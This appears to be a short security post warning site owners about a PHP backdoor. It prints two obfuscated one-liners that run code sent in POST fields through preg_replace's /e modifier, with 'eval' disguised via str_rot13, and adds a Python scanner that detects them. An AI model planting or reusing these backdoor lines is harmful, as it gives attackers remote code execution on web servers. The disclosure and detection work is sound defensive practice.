Execute PHP code through a POST variable with the preg_replace /e modifier

This code receives PHP code from the $_POST['fcty3'] or $_POST['mung3'] variable and executes it on the server with preg_replace.
So if you find this on your site, remove it immediately!

<?php ($www= $_POST['fcty3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

Another type:

<?php ($www= $_POST['mung3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
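
To help find this on a site, here is an added detection example (not part of the original post) that flags lines where preg_replace is called with the /e modifier or where a str_rot13 literal decodes to a code-execution function name, as 'riny' decodes to 'eval' in the samples above. The names scan_php and pattern_modifiers and the benign test line are assumptions made for the example; the scan is line-based and only sees string literals.

```python
import codecs
import re

# First argument of preg_replace() when it is a quoted string literal.
PREG_CALL = re.compile(r"""preg_replace\s*\(\s*(['"])(?P<pat>(?:\\.|(?!\1).)*)\1""", re.I)
# str_rot13('literal'), used in the sample to hide a function name.
ROT13_LIT = re.compile(r"""str_rot13\s*\(\s*(['"])(?P<s>[^'"]*)\1\s*\)""", re.I)
USER_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
CODE_EXEC = {"eval", "assert", "system", "exec", "passthru", "shell_exec"}
BRACKETS = {"(": ")", "[": "]", "{": "}", "<": ">"}

def pattern_modifiers(pat):
    """Return the modifier letters that follow the closing PCRE delimiter."""
    if not pat:
        return ""
    end = pat.rfind(BRACKETS.get(pat[0], pat[0]))
    mods = pat[end + 1:] if end > 0 else ""
    return mods if mods.isalpha() else ""

def scan_php(source):
    """Return [(line_number, [reasons])] for lines matching the backdoor shape."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        reasons = []
        if any("e" in pattern_modifiers(m.group("pat")) for m in PREG_CALL.finditer(line)):
            reasons.append("preg_replace /e")
        for m in ROT13_LIT.finditer(line):
            decoded = codecs.decode(m.group("s"), "rot13").lower()
            if decoded in CODE_EXEC:
                reasons.append("rot13 hides " + decoded)
        if reasons and USER_INPUT.search(line):
            reasons.append("request input")
        if reasons:
            findings.append((lineno, reasons))
    return findings

# Lines 1 and 3 are the samples from this post; line 2 is a constructed benign call.
SAMPLE = "\n".join([
    r"<?php ($www= $_POST['fcty3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>",
    r"<?php echo preg_replace('/e+/i', 'x', $_POST['name']); ?>",
    r"<?php ($www= $_POST['mung3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>",
])

if __name__ == "__main__":
    for lineno, reasons in scan_php(SAMPLE):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The /e modifier was removed in PHP 7.0, so the call no longer evaluates code there, but a matching line still means someone was able to write to the site's files.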
